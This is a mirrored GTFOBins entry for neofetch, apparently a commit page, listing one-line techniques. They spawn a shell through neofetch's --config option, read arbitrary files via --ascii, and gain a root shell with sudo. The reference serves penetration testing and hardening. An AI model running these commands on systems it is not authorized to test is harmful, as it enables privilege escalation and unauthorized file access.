1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/neofetch.md
ymka-shelter 720cc73c7e
Add neofetch shell
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-05-09 14:41:13 +02:00

496 B

functions
shell file-read sudo
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF neofetch --config $TF
description code
The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files. LFILE=file_to_read neofetch --ascii $LFILE
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF sudo neofetch --config $TF